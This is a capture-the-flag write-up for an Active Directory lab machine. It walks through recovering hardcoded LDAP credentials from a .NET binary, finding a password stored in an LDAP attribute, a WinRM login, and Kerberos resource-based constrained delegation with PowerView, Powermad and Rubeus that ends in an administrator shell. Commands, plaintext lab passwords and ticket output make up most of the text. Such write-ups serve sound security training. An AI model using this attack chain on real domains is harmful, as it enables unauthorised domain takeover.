Hi everyone! This machine is an Active Directory machine where we have to enumerate SMB shared folder, use dnSpy to reverse engineer a .NET binary for LDAP credentials, LDAP query to find another user’s credentials, initial access via winrm, and privilege escalate using Kerberos Resource-based Constrained Delegation. Let’s get started!
Nmap enumeration
$ IP=10.10.11.174 $ sudo nmap -sC -sV -p- 10.10.11.174 PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-02 06:48:58Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49664/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49682/tcp open msrpc Microsoft Windows RPC 49699/tcp open msrpc Microsoft Windows RPC 52169/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: -2s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2022-08-02T06:49:57 |_ start_date: N/A
SMB enumeration
Readable shared folder
$ smbmap -H $IP -u anonymous [+] Guest session IP: 10.10.11.174:445 Name: 10.10.11.174 Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ READ ONLY Remote IPC NETLOGON NO ACCESS Logon server share support-tools READ ONLY support staff tools SYSVOL NO ACCESS Logon server share
$ smbclient \\\\$IP\\support-tools Enter WORKGROUP\kali's password: Try "help" to get a list of possible commands. smb: \> dir . D 0 Wed Jul 20 13:01:06 2022 .. D 0 Sat May 28 07:18:25 2022 7-ZipPortable_21.07.paf.exe A 2880728 Sat May 28 07:19:19 2022 npp.8.4.1.portable.x64.zip A 5439245 Sat May 28 07:19:55 2022 putty.exe A 1273576 Sat May 28 07:20:06 2022 SysinternalsSuite.zip A 48102161 Sat May 28 07:19:31 2022 UserInfo.exe.zip A 277499 Wed Jul 20 13:01:07 2022 windirstat1_1_2_setup.exe A 79171 Sat May 28 07:20:17 2022 WiresharkPortable64_3.6.5.paf.exe A 44398000 Sat May 28 07:19:43 2022 4026367 blocks of size 4096. 884023 blocks available smb: \> get UserInfo.exe.zip
As available software with version numbers is shown to us, a quick google allows me to find a possible privilege escalation vector using 7-Zip. I also found that UserInfo.exe.zip is interesting as there is no official software that is called UserInfo. This binary might contains user credentials.
dnSpy obtaining credentials
While loading into IDA Freeware, I noticed that the binary is a .NET file. Thus, analyzing with dnSpy will be more ideal.
I decided to check out the LdapQuery class since during enumeration, I found out that credentials for LDAP query are required. Since the software can do LDAP queries, it might contain hardcoded credentials for the query.
I decided to write a Python script to obtain the plaintext password.
import base64
enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = "armando".encode("UTF-8")
array = base64.b64decode(enc_password)
array2 = ""
for i in range(len(array)):
array2 += chr(array[i] ^ key[i % len(key)] ^ 223)
print(array2)
PS C:\Users\lamecarrot\Desktop> py .\support_htb_crack.py
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
LDAP query
With the newly found credentials, we can do LDAP queries. While searching through the list of users, I noticed an interesting user which is also called support.
$ ldapsearch -v -x -b "DC=support,DC=htb" -H "ldap://$IP" "(objectclass=*)" "sAMAccountName" -D "support\\ldap" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' | grep sAMAccountName ... # requesting: sAMAccountName sAMAccountName: Administrator sAMAccountName: Guest sAMAccountName: Administrators sAMAccountName: Users sAMAccountName: Guests ... sAMAccountName: ldap sAMAccountName: support sAMAccountName: smith.rosario sAMAccountName: hernandez.stanley sAMAccountName: wilson.shelby sAMAccountName: anderson.damian sAMAccountName: thomas.raphael sAMAccountName: levine.leopoldo sAMAccountName: raven.clifton sAMAccountName: bardot.mary sAMAccountName: cromwell.gerard sAMAccountName: monroe.david sAMAccountName: west.laura sAMAccountName: langley.lucy sAMAccountName: daughtler.mabel sAMAccountName: stoll.rachelle sAMAccountName: ford.victoria sAMAccountName: MANAGEMENT$
I decided to look into support’s information and found an interesting section called “info”.
$ ldapsearch -v -x -b "CN=support,CN=Users,DC=support,DC=htb" -H "ldap://$IP" "(objectclass=*)" -D "support\\ldap" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' ... # support, Users, support.htb dn: CN=support,CN=Users,DC=support,DC=htb objectClass: top objectClass: person objectClass: organizationalPerson objectClass: user cn: support c: US l: Chapel Hill st: NC postalCode: 27514 distinguishedName: CN=support,CN=Users,DC=support,DC=htb instanceType: 4 whenCreated: 20220528111200.0Z whenChanged: 20220528111201.0Z uSNCreated: 12617 info: Ironside47pleasure40Watchful ...
Initial access
Winrm
Looking at the ports open, we can see that port 5985 is open which is for winrm. We can use evil-winrm to login using the possible found credential.
$ sudo gem install evil-winrm $ evil-winrm -i $IP -u "support" -p 'Ironside47pleasure40Watchful' ... *Evil-WinRM* PS C:\Users\support\Documents>
Giving it a try, I was able to login and obtained a shell.
User.txt
*Evil-WinRM* PS C:\Users\support\Documents> cd ..\Desktop *Evil-WinRM* PS C:\Users\support\Desktop> dir Directory: C:\Users\support\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 9/12/2022 9:30 PM 34 user.txt *Evil-WinRM* PS C:\Users\support\Desktop> type user.txt 7a****************************** *Evil-WinRM* PS C:\Users\support\Desktop>
Privilege escalation
References:
- https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution#impersonation
- https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a
- https://www.hackingarticles.in/domain-escalation-resource-based-constrained-delegation/
Kerberos Resource-based Constrained Delegation
Firstly, we will need to download two PS scripts. Copy paste and execute the commands below in your attacking machine.
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 wget https://raw.githubusercontent.com/Kevin-Robertson/Powermad/master/Powermad.ps1
Upload them via evil-winrm and import as modules.
upload PowerView.ps1 Import-Module .\PowerView.ps1 upload Powermad.ps1 Import-Module .\Powermad.ps1
We can check if users are allowed to create a new computer object on the domain. By default, a domain member can add up to 10 computers to the domain.
*Evil-WinRM* PS C:\Users\support\Desktop> Get-DomainObject -Identity "dc=support,dc=htb" -Domain support.htb
Now we have to check if the machine is at least Windows Server 2012.
*Evil-WinRM* PS C:\Users\support\Desktop> Get-DomainController
The victim machine is a Windows Server 2022.
Finally, we have to check if the target computer does not have the attribute msds-allowedtoactonbehalfofotheridentity set.
*Evil-WinRM* PS C:\Users\support\Desktop> hostname dc *Evil-WinRM* PS C:\Users\support\Desktop> Get-NetComputer dc | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity name msds-allowedtoactonbehalfofotheridentity ---- ---------------------------------------- DC
Create a new computer object
We can now create a new computer object. Paste the following in Powershell to create a new object and note the SID.
New-MachineAccount -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose Get-DomainComputer fake01 -Properties objectsid
Let’s create a new raw security descriptor for the “fake01” computer principal. Remember to change the SID to the value you have just found as well as the DomainComputer’s hostname.
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5101)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
Impersonate to get a ticket
Download Rubeus.exe into your attacking machine.
$ wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe
Upload into the victim’s machine via evil-winrm and generate a RC4 hash.
*Evil-WinRM* PS C:\Users\support\Desktop> upload Rubeus.exe *Evil-WinRM* PS C:\Users\support\Desktop> .\Rubeus.exe hash /password:123456 /user:fake01 /domain:support.htb ... [*] Action: Calculate Password Hash(es) [*] Input password : 123456 [*] Input username : fake01 [*] Input domain : support.htb [*] Salt : SUPPORT.HTBfake01 [*] rc4_hmac : 32ED87BDB5FDC5E9CBA88547376818D4 [*] aes128_cts_hmac_sha1 : 3E1A2E5F7675F6BA5C21FDEABFD92B93 [*] aes256_cts_hmac_sha1 : 37CD1332C1F8DC0C4AA0B738CC971DEBD8D66AED50AF2AF2EC63B7459344B834 [*] des_cbc_md5 : E0795B98AEA1A16B
We can now a requesting a Kerberos ticket for fake01$ while impersonating an administrator. Remember to change your RC4 hash, username, and domain name.
*Evil-WinRM* PS C:\Users\support\Desktop> .\Rubeus.exe s4u /user:fake01$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt ... [*] Action: S4U [*] Using rc4_hmac hash: 32ED87BDB5FDC5E9CBA88547376818D4 [*] Building AS-REQ (w/ preauth) for: 'support.htb\fake01$' [*] Using domain controller: ::1:88 [+] TGT request successful! [*] base64(ticket.kirbi): doIFUjCCBU6gAwIBBaEDAgEWooIEazCCBGdhggRjMIIEX6ADAgEFoQ0bC1NVUFBPUlQuSFRCoiAwHqAD AgECoRcwFRsGa3JidGd0GwtzdXBwb3J0Lmh0YqOCBCUwggQhoAMCARKhAwIBAqKCBBMEggQPiMLfi1VF FWLU+l33k1BX2eTlvLZlRVy0IydwFbFg9rcST4/hs8E/4QC1lC30yBRqTO8ZPwW0Fe56+jGy56xCOZqx 1pWr4a+x7PfVoUlaP7x3ieqj/k3Vj6x/yxEt+rqHF0yGgXTTSdpTeQOyeh+xV+deEIwdXxniJ4i6ic+1 G4QKjqGnKMO7zt3z3paOXlpNFmzoVjgv67hMaRP5fZqlvHthhpkwJIuyiIhe+CjvBE+B76OOK2T9/Ew3 g9G7bsBnrS6sXz11OOKJMFFFn0qZlc8FGquo8mW+O6hNCArEvK2uhPv46FNgCikJZE42SP55ob4r8kJh ivya41TlhZFlnsYVSugiK3OBdeOzd4USY/VJhyYrT2yZAfH6m+9a/gUdkWHkIscCii/heQ8AajpDmGGU WzGhVufRS0LgugOn93iWr8dnVV3+Ao+TCGQZcjA2dO2QtlUv+Thz6j0r80vZqG+5AICsPRhAxiOGt6FB clIdKQJgatJthZlH5HVycBijZPqxFTAy7fJGk20r+5DvQCKp8WhWi/7BrY/pXB2FSq+ZOKjuPovCgKmY Rjjd0XuySwm1Xr9JFVzT0nhTGOefNR3t8cjrlBjD749i3IUT9b7yRltEosRQ74jdP061TGShmWEIO6PP mGO1IjJzyZ8au3kO/4EXhn1Ns1/tVErfTmHFmFQCHK7QdMNu5ieKkggrKgRjJMrvZL1Uf8py4lm7SKaK 5X5Tr8/pKqAyyjh923NZgytaP00y3SZ1k98a1vOptbLMALnlJP+yxx1bYKKSZYzLZtGOA8o4adJY4a8N f3nIuH0+fkRS7xp8DFyu+z0NtB5whGOLfUMJUH0nuizH10YQEuyyl7DeBDCM5fnU83QtCeemYzG+IyvX et7+mK7UexWO2L+ALXEZ6BM/HRD7cHri5iVudifMtdCijcPYYMqEbTYQf4CPNZOby2W8j3DRNy4R6AQi e6L0D6u2iIW87rAfizXAFFhjvZuPncji5U4jFquQsrwc6+BkllCcr9LL2FxJGZpN9SQ/DVL0z/M2UoBN OgiXPcru3pgZuZyJpw0B4K9O/mjgnkGBdO5XVwXqfVpsOx5PlOVwT6RX3DgCmk0A5VMFfG+DMjT0fvYv utnwE61MD4vuXYg2Peqrk6w/YnRGRUtYNp9ukhA7hZktEd2jxnozbuKcxZPmnkPGyx3h4fzHFlHvRkPv iAGllehvG2GIe7O2WvGHNk6M4IgueYa7/xVvlz267OC/m5cTwiG8FcjARvS5xWqU6TA3DxjkR8Vc8/Eu 0w1yH5lIwlvGeJmOJpSCCaWIqWhSONget6DH11DQkSsXzXNRTjjJmqViRTFkmDQXK4uw4p2PkeLS4gVv 4FhvjKI6Rh6f6tbUV6OB0jCBz6ADAgEAooHHBIHEfYHBMIG+oIG7MIG4MIG1oBswGaADAgEXoRIEELrI eZczTUKToiWBxRxJKtOhDRsLU1VQUE9SVC5IVEKiFDASoAMCAQGhCzAJGwdmYWtlMDEkowcDBQBA4QAA pREYDzIwMjIwOTEzMTMwMDA2WqYRGA8yMDIyMDkxMzIzMDAwNlqnERgPMjAyMjA5MjAxMzAwMDZaqA0b C1NVUFBPUlQuSFRCqSAwHqADAgECoRcwFRsGa3JidGd0GwtzdXBwb3J0Lmh0Yg== [*] Action: S4U [*] Building S4U2self request for: 'fake01$@SUPPORT.HTB' [*] Using domain controller: dc.support.htb (::1) [*] Sending S4U2self request to ::1:88 [+] S4U2self success! [*] Got a TGS for 'administrator' to 'fake01$@SUPPORT.HTB' [*] base64(ticket.kirbi): doIFojCCBZ6gAwIBBaEDAgEWooIEwTCCBL1hggS5MIIEtaADAgEFoQ0bC1NVUFBPUlQuSFRCohQwEqAD AgEBoQswCRsHZmFrZTAxJKOCBIcwggSDoAMCARehAwIBAaKCBHUEggRx4GqH1czfri57bo+3vmr5UVUA E4gzxjUY3PnncX+H9G2LneLrmBbZbuWY4v7JwE2ku9msscaC/zpqfDIoAuF/fEe10vtppxUKWGIvLszR i+GSLuA5/3xf/ncl3ESNFjsOWpEMo2K5ZxFzuCZ+9/RfQy62cuNg8LX525Ayf+HOy6NwNTLBK5B0A05s fIzuhh3f3Bi8Zae2bj2xgmwmYg2BpnFH6iDGQbMWdmvA7AUW3wdumVsZ+sRGkDBY72D1//7NMdRJAigj NSBoVQL2n/K6dG7x1bA01UP8SXfvRZOLmPBPEgpBjEXb+MM1fNGrwvHzzs4mQv99lKwKcJpnXccOvmCt RhobH08zxK685jM05EIL1AHmI4KrwO+ycIFqcyfwzH0YR8hficj/kp07fBNZWTLFWSUWmrf6/b+Yem6r xR10sBPZjd20Tna8dhkmKJoNcl1MhGaoxX2hlivyVkjAakISL+gKMvKyRsnN+N3joaGbZ6SxT3KZXTCm ok2GthwsL1wEcUOyYtr1C/7N8D7rej5jEwsGcVwJzKN5ZoovQBIwoseM8VKYc7iG3Mj+d5oFQCDW999L Xbm/XifQyKwwkZ30SuSKbBlHA7gga46GMEHUBIFQTyFZQZN9zkKPX8g4a3b/2S/3uc9AYQMt83Se5Rt9 es8y3zvb9+1DR4epWZxOIY9hOMPG0nLTN2uECA4zQ3WcHxn5H5kEmW/giRCIvNxkmdfF9JNIGoHJoPJj aejLvOLz3tJarJdfc/fF18w2aWJ3InmW89CYIX7L+uNKc8fBWqmj+cBiXEuZl4QDOArV+D1g5mp+28N0 76HSJ0SLc7llz6VTQDE77PTEvUIgUsoSzCuVDSjIpi3PSrVNN+Zl40t/lvhfjWzEMDPCCfYlYhdXeuW2 uyHwUBP+7NBV0DYqDQUBWz0ggC9hQiA8X00vyFOgD/sZ/lSC2uvwtQI6rA3Ml4+zOd2nMGND9UrRc5I0 MNa+GBrl2khG46uEoJNmgT1jrq76JD7UcdB7h3PYq8IeV4gq2ru2xMUxwBahLN9YzO3cmcxL5SC1aUxQ bCCyY8Wdr4eVDHZQd0gwoctbHk+UKseFAGNMPtvsrCqRzEQh9hcSMxpOWjT3sGcSk1YJcG6az5ubedmp ddLsEr1ngrXuVG+Dk7B/6NfeFY1jE+oEOm66lUTvccMGYZwJYerDUzgb3nAaq0jbkdanI78TH4f3LRjo nzze2yXSvyODPknIBYvkRrUEFK0Bw64FtrODcnZXddVAOvTBCvU3PhHvtg1LdDy3fdHSv9H1zrvxdPwd 7p92BWuBzesDC/81rGZRIkEUfyhuvd7YidKQpFz8gFCOtJLt4WD05RG7xOnu1wQRxwTVnX37zPT3Eziu Ak7i8uX8T6ZwDmZyNUnqWBSeZv+hDsF10z+rfsCOjxhxMigYWbT3A0HEBTW9x9wRmuBi+i+jfiezRY+8 jUZYD4u8qx2WBoueeFpckQT8Eeu2jevNsNKjB7mhzglBGhUIP9jwo4HMMIHJoAMCAQCigcEEgb59gbsw gbiggbUwgbIwga+gGzAZoAMCARehEgQQXl+7Yg0OgOrPLUErTkbd9KENGwtTVVBQT1JULkhUQqIaMBig AwIBCqERMA8bDWFkbWluaXN0cmF0b3KjBwMFAEChAAClERgPMjAyMjA5MTMxMzAwMDZaphEYDzIwMjIw OTEzMjMwMDA2WqcRGA8yMDIyMDkyMDEzMDAwNlqoDRsLU1VQUE9SVC5IVEKpFDASoAMCAQGhCzAJGwdm YWtlMDEk [*] Impersonating user 'administrator' to target SPN 'cifs/dc.support.htb' [*] Building S4U2proxy request for service: 'cifs/dc.support.htb' [*] Using domain controller: dc.support.htb (::1) [*] Sending S4U2proxy request to domain controller ::1:88 [+] S4U2proxy success! [*] base64(ticket.kirbi) for SPN 'cifs/dc.support.htb': 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 Gw5kYy5zdXBwb3J0Lmh0Yg==
Let’s generate a ticket in the victim’s machine as psexec following the blog post won’t work since we are connecting back to the same machine. Once generated, we will need to download the ticket into our attacking machine.
*Evil-WinRM* PS C:\Users\support\Desktop> [IO.File]::WriteAllBytes("C:\Users\support\Documents\ticket.kirbi", [Convert]::FromBase64String("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")) *Evil-WinRM* PS C:\Users\support\Desktop> download ticket.kirbi
Make the ticket usable and use it
In our Kali, install an older version of impacket as the latest have some issues for some of the tools, install klist (krb5-user), and pyasn1. We will also need to get ticket_converter.py. Copy and paste the following into your attacking machine.
wget https://raw.githubusercontent.com/zer1t0/ticket_converter/master/ticket_converter.py pip3 install impacket==0.9.24 pip3 install pyasn1 sudo apt update sudo apt install krb5-user
Next, destroy any tickets in your attacking machine, convert the ticket to Linux usable, set the new ticket’s path.
kdestroy python3 ticket_converter.py ticket.kirbi ticket.ccache export KRB5CCNAME=ticket.ccache
We must set our hosts file to map the domain name and hostname to the victim’s IP address. Otherwise if we use the IP address instead, it will not work.
$ sudo nano /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
10.10.11.174 dc.support.htb support.htb
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Finally, we can use the ticket to get a shell in the victim’s machine.
$ impacket-wmiexec support.htb/administrator@dc.support.htb -no-pass -k
Impacket v0.9.24 – Copyright 2021 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell – Careful what you execute
[!] Press help for extra shell commands
C:>
root.txt
C:\>cd C:\Users\Administrator\Desktop C:\Users\Administrator\Desktop>dir Volume in drive C has no label. Volume Serial Number is 955A-5CBB Directory of C:\Users\Administrator\Desktop 05/28/2022 04:17 AM <DIR> . 05/28/2022 04:11 AM <DIR> .. 09/12/2022 09:30 PM 34 root.txt 1 File(s) 34 bytes 2 Dir(s) 3,884,412,928 bytes free C:\Users\Administrator\Desktop>type root.txt f2****************************** C:\Users\Administrator\Desktop>
I hope these tabs have been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. š
Lamecarrot 